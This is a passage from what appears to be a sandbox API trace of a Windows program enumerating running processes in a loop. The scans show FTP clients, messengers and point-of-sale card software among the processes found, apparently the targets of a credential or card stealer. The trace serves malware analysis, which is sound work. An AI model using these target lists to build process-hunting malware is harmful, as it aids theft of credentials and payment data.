lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0289.408] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0289.410] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0289.412] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0289.413] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0289.415] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0289.417] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0289.421] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0289.423] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0289.425] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0289.427] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0289.428] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0289.430] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0289.432] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0289.436] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0289.438] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0289.440] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0289.442] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0289.443] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0289.445] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0289.446] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0289.485] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0289.488] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0289.490] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0289.492] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0289.493] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0289.495] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0289.500] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0289.502] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.504] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.506] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0289.509] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0289.513] CloseHandle (hObject=0x224c) returned 1 [0289.513] Sleep (dwMilliseconds=0x64) [0289.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0289.633] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.636] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.640] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.641] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.643] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.644] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.646] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.647] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.649] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.650] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.654] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.656] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.657] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.660] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.662] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.663] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.665] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.666] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.718] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.720] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0289.722] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0289.723] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.725] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.726] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0289.728] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0289.729] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0289.733] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0289.735] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.736] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.737] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.739] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.740] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.742] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0289.743] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0289.745] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0289.748] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0289.750] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0289.751] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0289.753] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0289.754] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0289.756] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0289.757] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0289.758] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0289.760] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0289.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0289.801] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0289.803] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0289.804] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0289.806] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0289.810] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0289.811] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 